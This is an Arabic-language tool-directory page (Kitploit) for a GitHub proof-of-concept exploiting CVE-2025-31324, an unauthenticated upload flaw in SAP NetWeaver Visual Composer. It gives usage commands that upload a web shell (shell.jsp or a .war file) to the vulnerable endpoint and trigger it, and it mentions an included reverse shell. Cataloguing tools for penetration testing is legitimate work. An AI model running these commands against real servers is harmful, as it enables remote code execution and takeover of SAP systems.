Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-31324_PoC_SAP — إثبات المفهوم لثغرة CVE-2025-31324: رفع غير مصادق عليه في SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
أدوات/GitHubGitHub/abrewer251/cve-2025-31324_poc_sap
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubabrewer251/cve-2025-31324_poc_sap

CVE-2025-31324_PoC_SAP

إثبات المفهوم لثغرة CVE-2025-31324: رفع غير مصادق عليه في SAP NetWeaver Visual Composer Metadata Uploader

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
131منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

CVE-2025-31324_PoC

إثبات المفهوم لـ CVE-2025-31324: رفع غير مصادق عليه في SAP NetWeaver Visual Composer Metadata Uploader

ينفّذ هذا السكربت:

  1. رفع ملف إلى النقطة المعرّضة (عبر Upload host/port)
  2. تشغيل اختياري عبر HTTP GET (عبر Trigger host/port)
  3. تحقق أساسي من الاستجابة/تسجيل

مثال على الاستخدام: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

لديك أيضًا إمكانية رفع ملف .war إذا كانت هذه هي الطريقة التي تريد التنفيذ بها. cache.jsp عبارة عن شل عكسي سيمنحك وصولًا بمجرد دخولك إلى النظام. (ما زلنا نعمل على حل بعض المشكلات هناك)

إخلاء مسؤولية

هذا الغرض منه تعليمي فقط ولا ينبغي استخدامه في أي أنشطة ضارة. تأكد دائمًا من حصولك على الأذونات اللازمة واتباع الإرشادات الأخلاقية عند اختبار الثغرات الأمنية أو البحث فيها.

لأي أسئلة أو توضيحات، لا تتردد في التواصل. ابقَ آمنًا ومحميًا!

تنزيل الأداة